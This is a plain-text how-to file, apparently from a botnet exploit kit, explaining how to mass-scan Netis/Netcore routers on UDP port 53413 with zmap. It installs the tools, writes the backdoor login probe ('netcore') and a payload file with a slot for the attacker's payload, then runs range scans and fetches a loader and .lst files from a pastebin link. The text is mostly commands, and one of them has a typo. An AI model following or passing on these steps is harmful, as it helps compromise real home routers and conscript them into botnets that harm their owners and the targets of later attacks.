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TL-BOTS/TL.EXPLOIT_SCAN/2SORT.Various/Exploits/Netis-dead/HOW TO.txt

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2019-10-02 20:41:26 +00:00
There are multiple ways to scan netis so we are going to go over
all of them here. They are all very simple just pay attention.
Lets start with installing what you will need to scan it.
For Centos:
yum update -y; yum install python python-requests python-paramiko -y
(Download the file named zmap.sh from my pastebin and upload it)
sh zmap.sh
For any other os:
apt-get update -y; apt-get install zmap python python-requests python-paramiko -y
Now, for the first method of scanning netis you need to run these commands on your server:
python -c "pring 'A'*8 + 'netcore \x00'" > login
python -c "print 'AA\x00\x00AAAA (YOUR PAYLOAD HERE)*\x00'" > payload
One way to scan netis is with a sh file.
1: nano anything.sh
2: paste the ranges found on my pastebin or add your own
3: sh anything.sh
An example of the ranges would be
(zmap -M udp -p53413 --probe-args=file:login -i eth0
Doing this will run the zmap command scanning all the ranges in the sh file.
Another way to scan zmap is with a .lst file.
Download the .lst files as well as a loader and a sh file
that will run the commands to scan for you from the zip file
using the link at the bottom of the paste.
1: download the files
2: upload the files
3: sh netis.sh